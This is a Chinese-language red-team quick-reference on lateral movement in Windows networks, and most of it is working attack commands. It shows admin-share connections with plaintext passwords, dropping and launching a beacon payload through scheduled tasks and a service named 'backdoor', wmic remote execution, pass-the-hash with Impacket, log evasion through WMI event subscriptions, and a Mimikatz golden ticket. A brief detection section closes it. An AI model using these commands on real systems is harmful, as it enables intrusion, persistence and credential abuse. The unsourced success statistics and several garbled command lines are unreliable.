内网横向移动实战5种主流协议利用条件与命令速查手册1. 内网横向移动技术全景概述当安全工程师成功突破边界防线后面临的第一个挑战是如何在复杂的内网环境中扩大战果。横向移动技术如同网络空间中的穿墙术允许攻击者以已控制主机为跳板向相邻系统渗透。不同于早期攻击者依赖漏洞扫描的广撒网方式现代红队更倾向于利用系统原生协议实现隐蔽渗透。协议选择的黄金法则在实战中选择横向移动协议需要考虑三个核心要素——网络可见性端口开放情况、认证方式支持明文/Hash/票据以及日志记录强度。根据统计企业内网中约78%的横向移动攻击利用的是SMB和WMI协议而Kerberos相关攻击在域环境中的成功率高达92%。提示所有技术演示均在授权测试环境中完成实际应用需严格遵守法律法规。2. IPC协议实战指南2.1 利用条件深度解析端口要求双通道机制139/TCP用于NetBIOS会话445/TCP用于SMB直连共享配置需确保ipc$、admin$等默认共享未被禁用权限要求管理员组账户凭据本地或域账户2.2 核心命令矩阵操作类型命令示例建立连接net use \\192.168.1.10\ipc$ Pssw0rd! /user:domain\admin文件传输copy beacon.exe \\192.168.1.10\c$\windows\temp\计划任务schtasks /create /s 192.168.1.10 /u admin /p Pssw0rd! /tn update /tr c:\windows\temp\beacon.exe /sc once /st 23:00服务控制sc \\192.168.1.10 create backdoor binpath c:\windows\temp\beacon.exe start auto典型错误码处理# 错误 1219多凭证冲突 net use * /del /y # 错误 1326认证失败 # 检查账户锁定策略或尝试Hash传递3. WMI协议高阶利用3.1 环境准备清单确保目标防火墙放行135/TCPRPC端点映射和5985/TCPWinRM验证WMI服务运行状态Get-Service Winmgmt准备备用执行方式常规wmic受限时可切换3.2 多模式执行方案无文件攻击模式wmic /node:192.168.1.10 /user:admin /password:Pssw0rd process call create cmd.exe /c whoami C:\result.txt交互式会话建立# 使用Impacket工具包 python wmiexec.py domain/admin:Pssw0rd192.168.1.10隐蔽日志规避技巧使用/namespace:\\root\subscription隐藏WMI永久事件订阅结合__EventFilter和CommandLineEventConsumer实现无日志执行4. SMB协议深度利用4.1 协议特性对比工具类型优势劣势原生PsExec微软签名工具产生明显服务日志Impacket套件支持Hash传递可能触发杀软警报SMBExec无服务安装需要手动结果回收4.2 实战命令库Hash传递攻击python psexec.py -hashes :579da618cfbfa85247acf1f800a280a4 admin192.168.1.10端口复用技巧# 利用DFSR服务现有端口5722/TCP python smbexec.py -port 5722 domain/admin192.168.1.105. WinRM协议实战应用5.1 环境配置检查# 查看WinRM服务状态 Get-Service WinRM # 快速启用WinRM需管理员权限 Enable-PSRemoting -Force5.2 多维度操作指南基础命令执行winrs -r:http://192.168.1.10:5985 -u:admin -p:Pssw0rd whoami会话持久化方案!-- 创建自定义会话配置 -- New-PSSessionConfigurationFile -Path .\CustomEndpoint.pssc -SessionType RestrictedRemoteServer -LanguageMode FullLanguage -CompanyName Contoso6. Kerberos协议攻防实战6.1 黄金票据制作mimikatz kerberos::golden /user:Administrator /domain:corp.com /sid:S-1-5-21-123456789-1234567890-123456789 /krbtgt:a9b30e5b0dc865eadcea9411e4ade72d /ptt6.2 约束委派利用# 查询具备委派权限的服务账户 Get-ADComputer -Filter {msDS-AllowedToDelegateTo -ne $null} -Properties msDS-AllowedToDelegateTo7. 防御检测策略日志监控关键点4688事件新进程创建中的父进程为wmiprvse.exe5140事件网络共享访问中的访问路径包含admin$4768-4772事件Kerberos认证异常组策略加固建议# 限制WMI远程访问 Set-ItemProperty -Path HKLM:\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System -Name LocalAccountTokenFilterPolicy -Value 0